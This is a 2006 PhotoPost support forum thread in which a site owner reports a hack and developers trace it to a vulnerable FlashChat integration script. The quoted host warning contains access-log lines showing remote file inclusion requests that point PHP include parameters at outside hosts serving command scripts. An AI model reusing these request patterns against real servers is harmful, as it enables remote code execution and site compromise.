PhotoPost Photo Gallery Sales PhotoPost Sales Toll Free Phone Number
Mon-Fri 9am-4pm EST
  PhotoPost Photo Sharing Photo Gallery    Visualize community tm
| | | | | | | | |

Go Back   PhotoPost Community > PhotoPost Support > PhotoPost Pro Support Forums > Photopost Pro How Do I...?

Photopost Pro How Do I...? Wondering how to do things in PhotoPost?

Reply
 
LinkBack Thread Tools Rate Thread Display Modes
Old September 21st, 2006, 01:29 PM   #1 (permalink)
Member
Verified Customer
 
Join Date: Aug 2004
Posts: 130
Exclamation Hacked... need help securing!

I was just sent this from my host and need to know how I can secure the photopost access they mention. Any help is appreciated. If not corrected, they say they can terminate my service

"It has come to our attention that your web space has been hacked:

213.140.19.121 - - [20/Sep/2006:06:49:26 -0400] "GET
/photopost/index.php?cat=http://busca.uol.com.br/uol/index.html?&cmd=id
HTTP/1.1" 200 74648 thescraphabit.com "-" "-" "-"
69.199.17.144 - - [20/Sep/2006:12:07:14 -0400] "GET
/store/certificates.php?Inc_Dir=http://cygnuspace.com/cmd.gif? HTTP/1.1"
200 2318 www.thescraphabit.com "-" "libwww-perl/5.65" "-"
66.79.167.236 - - [20/Sep/2006:14:11:24 -0400] "GET
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.acuariopeces.com/pnT
emp/cmd.dat?? HTTP/1.1" 200 2326 www.thescraphabit.com "-"
"libwww-perl/5.805" "-"
--
The above was taken from your access logs. It shows that
/photopost/index.php, /store/certificates.php,
/chat/inc/cmses/aedatingCMS.php were used to perpetrate the hack. "
alma townsend is offline   Reply With Quote
Old September 21st, 2006, 03:32 PM   #2 (permalink)
Photopost Developer
Verified Customer
 
Chuck S's Avatar
 
Join Date: Jun 2002
Location: Abingdon,MD
Posts: 66,788
Hello what version of photopost you using? If it is version 5 or above they can type that all they want and its not going to do anything since cat is typecast as an interger on that index script
__________________
Photopost Developer and Support Engineer

Please do not PM me for support or sales questions. Thank you for your understanding.
Chuck S is offline   Reply With Quote
Old September 21st, 2006, 03:54 PM   #3 (permalink)
PhotoPost Developer
Verified Customer
 
Join Date: Jan 2002
Posts: 11,858
/chat/inc/cmses/aedatingCMS.php

Thats the file my server was hacked with (and alot of other people's); just because the photopost URL was called like that doesn't mean they got in. If you are running a version from even the past year that command failed and they got in from your aedatingCMS.php script.
__________________
Please do not PM me for support or sales questions. Thank you for your understanding.
Michael P is offline   Reply With Quote
Old September 21st, 2006, 08:43 PM   #4 (permalink)
Member
Verified Customer
 
Join Date: Aug 2004
Posts: 130
I am running Photopost 5.31

I don't know what aedatingCMS.php script is, so I will do some searching and hope to find a way to prevent this again.

Thanks
alma townsend is offline   Reply With Quote
Old September 21st, 2006, 10:21 PM   #5 (permalink)
PhotoPost Developer
Verified Customer
 
Join Date: Jan 2002
Posts: 11,858
It's part of the flashchat program; in your src/cmses directory you should only have the one integration script you are using. FlashChat released an update a little while back, but not before alot of sites had been compromised; mine included.
__________________
Please do not PM me for support or sales questions. Thank you for your understanding.
Michael P is offline   Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes Rate This Thread
Rate This Thread:

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


Similar Threads
Thread Thread Starter Forum Replies Last Post
Script was hacked...please help thebroadroom General Discussion 5 September 29th, 2006 09:52 PM
A nicely hacked CMS with PP b6gm6n General Discussion 3 December 15th, 2005 03:26 PM
I was hacked and photopost is gone Al Gregory Photopost Pro How Do I...? 6 September 17th, 2005 04:37 PM
securing photopost cognaccola General Discussion 7 October 29th, 2004 08:12 PM


All times are GMT -5. The time now is 06:50 AM.

Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.2.0